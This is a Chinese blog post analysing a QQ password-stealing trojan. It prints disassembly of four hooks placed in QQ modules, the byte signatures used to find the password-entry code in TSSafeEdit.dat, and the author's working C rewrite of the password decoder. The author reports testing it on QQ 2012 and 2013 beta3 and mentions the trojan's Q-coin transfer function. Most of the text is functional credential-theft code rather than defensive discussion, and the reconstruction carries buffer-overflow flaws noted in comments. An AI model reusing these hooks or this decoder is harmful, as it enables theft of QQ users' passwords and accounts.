分析与提取QQ木马盗号技术
下面是測試的貼圖;
?
程序大致流程如下圖:
程序是用Delphi寫的,只有加載器加了個upx殼,其他的都沒有加殼;
所以分析起來就比較簡單了;
這個程序的關鍵技術都在ntshruis2.dll這個模塊中了;
主要是hook了QQ進程中的 4 個關鍵地方;
1.
; Hook 1 -- resolve the IsValidAccount export of KernelUtil.dll and patch it.
; The author reports this hook is what yields the QQ account number.
CODE:0040F9A5                 push    offset a?isvalidaccoun ; "?IsValidAccount@Misc@Util@@YAHVCTXStrin"...
CODE:0040F9AA                 push    offset aKernelutil_d_0 ; "KernelUtil.dll"
CODE:0040F9AF                 call    GetModuleHandleA_0 ; eax = base of the already-loaded KernelUtil.dll
CODE:0040F9B4                 push    eax             ; hModule
CODE:0040F9B5                 call    GetProcAddress_0 ; eax = address of the export named above
CODE:0040F9BA                 push    0Fh             ; int
CODE:0040F9BC                 push    20h             ; int
CODE:0040F9BE                 push    offset unk_413A10 ; int
CODE:0040F9C3                 push    offset sub_40D11C ; int -- presumably the detour routine (cf. sub_40F7EC for hook 4)
CODE:0040F9C8                 push    ebx             ; nSize
CODE:0040F9C9                 push    eax             ; lpBaseAddress -- the resolved export is the patch site
CODE:0040F9CA                 call    sub_406E28      ; hook installer (author's label: "hook")
hook "KernelUtil.dll" 模塊中的 "?IsValidAccount@Misc@Util@@YAHVCTXStrin" 導出函數,主要是為了獲取QQ號;
2.
; Hook 2 -- same pattern as hook 1, applied to the GetAccountName export.
; The author says the trojan's later "top up Q-coins to a chosen account"
; logic runs inside this hook.
CODE:0040F9CF                 push    offset a?getaccountnam ; "?GetAccountName@Account@Util@@YA?AVCTXS"...
CODE:0040F9D4                 push    offset aKernelutil_d_0 ; "KernelUtil.dll"
CODE:0040F9D9                 call    GetModuleHandleA_0 ; eax = base of KernelUtil.dll
CODE:0040F9DE                 push    eax             ; hModule
CODE:0040F9DF                 call    GetProcAddress_0 ; eax = address of the export
CODE:0040F9E4                 push    0Fh             ; int
CODE:0040F9E6                 push    20h             ; int
CODE:0040F9E8                 push    offset unk_413A34 ; int
CODE:0040F9ED                 push    offset sub_40F51C ; int -- presumably the detour routine
CODE:0040F9F2                 push    ebx             ; nSize
CODE:0040F9F3                 push    eax             ; lpBaseAddress -- patch site
CODE:0040F9F4                 call    sub_406E28      ; hook installer
hook "KernelUtil.dll" 模塊中的 "?GetAccountName@Account@Util@@YA?AVCTXS",這個主要是這個木馬在後續中會
給指定帳號充入Q幣;
3.
CODE:0040F9F9                 push    5
; Hook 3 -- no export to resolve here: a byte signature is searched for
; inside GF.dll and the match address is patched.  The author says this hook
; reveals which button the user pressed (e.g. the login button).
; eax/edx/ecx presumably carry the first three arguments (Delphi register
; convention, the page says the binary is Delphi); the meaning of the
; pushed constants is not established on this page.
CODE:0040F9FB                 push    228390h
CODE:0040FA00                 push    0
CODE:0040FA02                 mov     edx, offset unk_4117C0 ; signature bytes (author: 68 00 00 00 00 E8 00)
CODE:0040FA07                 mov     ecx, 21h
CODE:0040FA0C                 mov     eax, offset _str_GF_DLL.Text ; "GF.dll"
CODE:0040FA11                 call    sub_4069CC      ; author: searches GF.dll for the signature, returns the address to hook
CODE:0040FA16                 push    0Fh             ; int
CODE:0040FA18                 push    20h             ; int
CODE:0040FA1A                 push    offset unk_413A88 ; int
CODE:0040FA1F                 push    offset sub_40F66C ; int -- presumably the detour routine
CODE:0040FA24                 push    5               ; nSize
CODE:0040FA26                 push    eax             ; lpBaseAddress -- the signature match
CODE:0040FA27                 call    sub_406E28      ; hook installer
hook "GF.dll" 模塊中特征碼為 68 00 00 00 00 E8 00 處的地址;
主要是為了獲取用戶按了什么按鍵,比如登錄按鈕;
4.
這個也是最關鍵的地方,是獲取QQ密碼的地方
; Hook 4 -- password capture.  Two alternative byte signatures are searched
; for inside TSSafeEdit.dat; each branch installs a different detour
; (sub_40F814 vs. sub_40F7EC).  The author notes only one site is hooked per
; run and has not worked out how the branch is chosen.
CODE:0040FB08                 push    1
CODE:0040FB0A                 push    186A0h
CODE:0040FB0F                 push    0
CODE:0040FB11                 mov     edx, offset unk_4117B8 ; signature 1: 88 5D 0F 83 7E 04
CODE:0040FB16                 mov     ecx, 6
CODE:0040FB1B                 mov     eax, offset _str_TSSafeEdit_dat_0.Text ; "TSSafeEdit.dat"
CODE:0040FB20                 call    sub_4069CC      ; signature scan, as in hook 3; eax = match address
CODE:0040FB25                 mov     esi, eax
CODE:0040FB27                 push    0Fh             ; int
CODE:0040FB29                 push    20h             ; int
CODE:0040FB2B                 push    offset unk_413AAC ; int
CODE:0040FB30                 push    offset sub_40F814 ; int -- detour for signature 1
CODE:0040FB35                 push    7               ; nSize
CODE:0040FB37                 push    esi             ; lpBaseAddress -- patch site
CODE:0040FB38                 call    sub_406E28      ; hook installer
CODE:0040FB3D                 jmp     short loc_40FB74
CODE:0040FB3F ; ---------------------------------------------------------------------------
CODE:0040FB3F
CODE:0040FB3F loc_40FB3F:                             ; CODE XREF: sub_40F910+1F6j
CODE:0040FB3F                 push    1
CODE:0040FB41                 push    186A0h
CODE:0040FB46                 push    0
CODE:0040FB48                 mov     edx, offset unk_4117B0 ; signature 2: 8B 5B 04 03 5D 10 (the author's own tests on QQ 2012 and 2013 beta3 all took this branch)
CODE:0040FB4D                 mov     ecx, 5
CODE:0040FB52                 mov     eax, offset _str_TSSafeEdit_dat_0.Text ; "TSSafeEdit.dat"
CODE:0040FB57                 call    sub_4069CC      ; signature scan; eax = match address
CODE:0040FB5C                 mov     esi, eax
CODE:0040FB5E                 push    0Fh             ; int
CODE:0040FB60                 push    20h             ; int
CODE:0040FB62                 push    offset unk_413AAC ; int
CODE:0040FB67                 push    offset sub_40F7EC ; int -- detour for signature 2 (listed below)
CODE:0040FB6C                 push    6               ; nSize
CODE:0040FB6E                 push    esi             ; lpBaseAddress -- patch site
CODE:0040FB6F                 call    sub_406E28      ; hook installer
hook "TSSafeEdit.dat" 中的特征碼有兩處,只要hook其中的一處就可以;具體是怎么判斷要hook哪處的,這個我還沒看出來;
這里我們就著重分析下獲取密碼的算法;
這里是hook "TSSafeEdit.dat" 中的地址之后,跳到我們自己的函數中;
; Detour installed by hook 4 (signature 2).  Saves all registers, gathers six
; values out of the hooked routine's context (ecx-relative fields plus
; [esi+0C0h]+2), calls sub_40F6A4 (the decoder the author rewrites below as
; GetPassword), restores registers and continues into the original code via
; off_4117A4.  The register layout is whatever the hooked code in
; TSSafeEdit.dat happens to use -- it is version-specific, which matches the
; author's note that QQ 2013 release breaks it.
CODE:0040F7EC sub_40F7EC      proc near               ; DATA XREF: sub_40F910+257o
CODE:0040F7EC                 pusha
CODE:0040F7ED                 mov     eax, [esi+0C0h]
CODE:0040F7F3                 add     eax, 2          ; 6th arg: szKey2 (lookup table)
CODE:0040F7F6                 push    eax
CODE:0040F7F7                 push    dword ptr [ecx+48h] ; 5th arg: nbyte (stride)
CODE:0040F7FA                 push    dword ptr [ecx+40h] ; 4th arg: nPwdLen
CODE:0040F7FD                 push    dword ptr [ecx+8] ; 3rd arg: nLen
CODE:0040F800                 push    dword ptr [ecx+14h] ; 2nd arg: szkey1
CODE:0040F803                 push    dword ptr [ecx+4] ; 1st arg: szBuf (encoded buffer)
CODE:0040F806                 call    sub_40F6A4      ; decoder; stdcall, so args are consumed by the callee
CODE:0040F80B                 popa
CODE:0040F80C                 jmp     ds:off_4117A4   ; back to the original code path (the author's gHookPasswordJmp)
CODE:0040F80C sub_40F7EC      endp
翻譯下
  // Author's C-level rendering of sub_40F7EC.  Pushes are right-to-left, so
  // the last push is GetPassword's first parameter.
  __asm
  {
    pushad
    mov eax, [esi+0xC0];
    add eax, 2;
    push eax;                    // szKey2: lookup table ("key2")
    push dword ptr [ecx+0x48];   // nbyte: author unsure; saw 0x0D, value not constant
    push dword ptr [ecx+0x40];   // nPwdLen: password length
    push dword ptr [ecx+0x08];   // nLen: length of the string to decode
    push dword ptr [ecx+0x14];   // szkey1: author's guess -- "key1"
    push dword ptr [ecx+0x04];   // szBuf: the string to decode
    call GetPassword;
    popad
    jmp gHookPasswordJmp         // resume the original code
  }
call sub_40F6A4 這個函數比較長,
所以我就貼下我寫好的這段解密代碼;
/*
 * Author's C rewrite of the trojan's decoder (sub_40F6A4), as called from
 * the TSSafeEdit.dat detour.  Parameter mapping follows the pushes in
 * sub_40F7EC: szBuf = [ecx+4] (encoded buffer), szkey1 = [ecx+14h]
 * (per-byte flags; author's guess "key1"), nLen = [ecx+8] (buffer length),
 * nPwdLen = [ecx+40h] (password length), nbyte = [ecx+48h] (stride; author
 * observed 0x0D, not constant), szKey2 = [esi+0C0h]+2 (lookup table).
 *
 * What the code below does: every nbyte-th byte of szBuf (index n1*nbyte-1)
 * is examined.  If the matching szkey1 byte is non-zero, the byte is looked
 * up in the first 0x81 entries of szKey2 and the entry's index becomes the
 * plaintext character (lowercase letters are uppercased before the lookup
 * and 32 is added back afterwards; a byte absent from the table is dropped).
 * If the flag byte is zero the byte is copied through unchanged.  The body
 * runs once per process (bFrist guard) and emits the result with
 * OutputDebugStringA, i.e. it is visible to any attached debugger.
 *
 * Limitations of this reconstruction (not fixed here, it is an analysis
 * artefact): nLen is never consulted, so reads of szBuf/szkey1 are
 * unbounded; szPwd is a fixed 50-byte buffer appended with strcpy, so
 * nPwdLen >= 50 overflows it; sprintf_s/OutputDebugStringA/TRUE are
 * MSVC/Win32 only.  bFrist is a file-scope flag defined elsewhere (BOOL
 * assumed -- TODO confirm).
 */
void __stdcall GetPassword(char *szBuf, char *szkey1, int nLen, int nPwdLen, int nbyte, char* szKey2)
{
  int n1;                       // 1-based position within the password
  int n2;                       // byte index into szBuf/szkey1 = n1*nbyte - 1
  int n3;                       // current encoded byte (char promoted to int)
  int n4;                       // 1 if the byte was a lowercase letter before uppercasing
  int n5;                       // index into szKey2 = recovered character value
  char szPwd[50] = {0};         // recovered password; appends are not bounds-checked
  if (!bFrist)
  {
    bFrist = TRUE;              // one-shot: every later call is a no-op
    if (nPwdLen > 0)
    {
      n1 = 1;
      do 
      {
        n2 = n1 * nbyte - 1;    // stride nbyte through the buffer; nLen is never checked
        if (*(szkey1 + n2))     // non-zero flag byte: this character is table-encoded
        {
          n3 = *(szBuf + n2);   // NOTE(review): plain char -- bytes >= 0x80 read as negative where char is signed
          if (n3 <= 0x60 || n3 >= 0x7B)
          {
            n4 = 0;
          }
          else
          {
            n3 -= 0x20;         // 'a'..'z' -> 'A'..'Z' before the table search
            n4 = 1;
          }
          n5 = 0;
          while ( n3 != *(szKey2 + n5) )
          {
            ++n5;
            if ( n5 == 0x81 )
              goto LABEL_16;    // not within the first 0x81 table entries: character is dropped
          }
          char szTmp[2] = {0};
          if (n4 == 1)
          {
            sprintf_s(szTmp, "%c", n5+32);  // restore lowercase
          }
          else
          {
            sprintf_s(szTmp, "%c", n5);
          }
          int nSize = strlen(szPwd);
          strcpy(szPwd + nSize, szTmp);     // append; overflows szPwd once 49 characters are stored
        }
        else
        {
          char szTmp[2] = {0};
          sprintf_s(szTmp, "%c", *(szBuf + n2));  // flag clear: byte passes through unchanged
          int nSize = strlen(szPwd);
          strcpy(szPwd + nSize, szTmp);
        }
    LABEL_16:
        ++n1;
      } while (nPwdLen-- != 1); // post-decrement compares the old value: nPwdLen iterations in total
    }
    OutputDebugStringA(szPwd);  // recovered string goes to the debugger output stream
  }
  
}
源碼就不放出來了。到這里,關鍵的一些技術差不多就這樣了,這個木馬源碼還有為指定用戶充Q幣的功能;
都在 hook "KernelUtil.dll" 模塊中的 "?GetAccountName@Account@Util@@YA?AVCTXS" 中操作,有興趣的可以看看;
測試最近的QQ版本;
2012 版的在 win7、xp 下測試通過;
2013 beta3 版的在 xp 下測試通過;win7 下會崩潰;
2013 正式版的測試了,用不了;
不過據說已經有牛人寫出了R0和R3驅動結合的Hook,可以突破2013正式版。不過現在沒工夫去研究那些名堂了。
轉(zhuǎn)載于:https://www.cnblogs.com/nickli666/articles/3467379.html